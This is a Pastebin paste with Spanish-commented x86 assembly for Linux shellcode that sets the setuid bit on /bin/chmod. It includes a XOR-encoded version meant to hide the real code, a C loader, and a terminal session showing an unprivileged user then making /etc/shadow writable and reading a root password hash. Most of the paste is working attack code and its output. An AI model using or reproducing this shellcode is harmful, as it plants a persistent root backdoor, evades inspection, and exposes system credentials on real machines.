Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ASM to change the permissions of chmod getting SuID :
- File chmod.asm:
- SECTION .text ; Seccion de datos
- global _start ; Donde empieza el programa
- _start: ; Empieza el programa
- jmp callback ; Jump-call-pop
- programa:
- pop esi ; Desapilamos la direccion de la sig ins
- ; previo call, tenemos el db
- xor ecx,ecx
- mov cx,0x89ED ; Param #2, Modo, 4755 (8) -> 0x9ED (H), modo raw (0x89ED)
- ; +info: comando stat %a %f
- mov ebx,esi ; Param #1, Fichero a cambiar
- xor eax,eax
- mov al,0xf ; Chmod es 15 -> 0xF
- ; arch/x86/include/generated/uapi/asm/unistd_32.h
- int 0x80 ; Llamada al sistema
- xor ebx,ebx ; Salimos, todo ha ido bien, param #1 de todo OK = '0'
- xor eax,eax
- mov al,1 ; Funcion exit
- int 0x80 ; Llamada al sistema
- callback:
- call programa
- db "/bin/chmod"
- ######################################################################################
- Xor version to hide the real code:
- # nasm -f elf chmod.asm -o chmod.o
- # ld -o asmchmod chmod.o
- # objdump -M intel -d asmchmod | grep 80480 | grep -v '>:' | cut -f2 | perl -p -e 's/ [ \n]*//g'
- eb175e31c966b9ed8989f331c0b00fcd8031db31c0b001cd80e8e4ffffff2f62696e2f63686d6f64
- # ./parse.py xor eb175e31c966b9ed8989f331c0b00fcd8031db31c0b001cd80e8e4ffffff2f62696e2f63686d6f64 18
- f30f4629d17ea1f59191eb29d8a817d59829c329d8a819d598f0fce7e7e7377a7176377b7075777c
- File chmodxor.asm:
- SECTION .text ; Seccion de datos
- global _start ; Donde empieza el programa
- _start: ; Empieza el programa
- jmp callback ; Jump-call-pop
- programa:
- pop esi ; Desapilamos la direccion donde estan los byte
- mov ebx,esi
- ; XOR START
- xor ecx, ecx ; Contador a 0
- mov cl,40 ; Cuantos contadores vamos a leer
- loopxor:
- mov al,[esi]
- xor al,18h ; Xor del codigo con 0x18
- mov [esi],al
- inc esi ; Incrementamos en busqueda de la siguiente posicion
- dec cl ; Decrementamos el contador
- jnz loopxor
- ; XOR FINISH
- jmp ebx
- callback:
- call programa
- db 0f3h, 00fh, 046h, 029h, 0d1h, 07eh, 0a1h, 0f5h, 091h, 091h, 0ebh, 029h, 0d8h, 0a8h, 017h, 0d5h, 098h, 029h, 0c3h, 029h, 0d8h, 0a8h, 019h, 0d5h, 098h, 0f0h, 0fch, 0e7h, 0e7h, 0e7h, 037h, 07ah, 071h, 076h, 037h, 07bh, 070h, 075h, 077h, 07ch
- ######################################################################################
- # nasm -f elf chmodxor.asm -o chmod.o
- # ld -o asmchmod chmod.o
- # objdump -M intel -d asmchmod | grep 80480 | grep -v '>:' | cut -f2 | perl -p -e 's/ [ \n]*//g'
- eb145e89f331c9b1288a063418880646fec975f5ffe3e8e7fffffff30f4629d17ea1f59191eb29d8a817d59829c329d8a819d598f0fce7e7e7377a7176377b7075777c
- # ./parse.py hex eb145e89f331c9b1288a063418880646fec975f5ffe3e8e7fffffff30f4629d17ea1f59191eb29d8a817d59829c329d8a819d598f0fce7e7e7377a7176377b7075777c
- \xeb\x14\x5e\x89\xf3\x31\xc9\xb1\x28\x8a\x06\x34\x18\x88\x06\x46\xfe\xc9\x75\xf5\xff\xe3\xe8\xe7\xff\xff\xff\xf3\x0f\x46\x29\xd1\x7e\xa1\xf5\x91\x91\xeb\x29\xd8\xa8\x17\xd5\x98\x29\xc3\x29\xd8\xa8\x19\xd5\x98\xf0\xfc\xe7\xe7\xe7\x37\x7a\x71\x76\x37\x7b\x70\x75\x77\x7c
- File shellcode.c:
- #include <unistd.h>
- unsigned char shellcode[] = \
- "\xeb\x14\x5e\x89\xf3\x31\xc9\xb1\x28\x8a\x06\x34\x18\x88\x06\x46\xfe\xc9\x75\xf5\xff\xe3\xe8\xe7\xff\xff\xff\xf3\x0f\x46\x29\xd1\x7e\xa1\xf5\x91\x91\xeb\x29\xd8\xa8\x17\xd5\x98\x29\xc3\x29\xd8\xa8\x19\xd5\x98\xf0\xfc\xe7\xe7\xe7\x37\x7a\x71\x76\x37\x7b\x70\x75\x77\x7c";
- void main(){
- int (*ret)() = (int(*)()) shellcode;
- ret();}
- ######################################################################################
- # ls -l /bin/chmod
- -rwxr-xr-x 1 root root 54904 Jan 26 2013 /bin/chmod
- # su - prueba
- $ chmod 777 /etc/shadow
- chmod: changing permissions of `/etc/shadow': Operation not permitted
- $ exit
- exit
- # gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
- # ./shellcode
- # ls -l /bin/chmod
- -rwsr-xr-x 1 root root 54904 Jan 26 2013 /bin/chmod
- # su prueba
- $ chmod 777 /etc/shadow
- $ grep root /etc/shadow
- root:$6$jwJ6uky6$IHR7LyNfY6BpZiRd6cjVjiBtLyNfY5Y9N.gXN7B8t4FOtKRnZO5Y9NymHQus.3Ec7XaHJsdRYec77HnLyNfYM/:15992:0:99999:7:::
- $ echo "I change the hash and the salt in pastebin :-), now without execstack..."
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement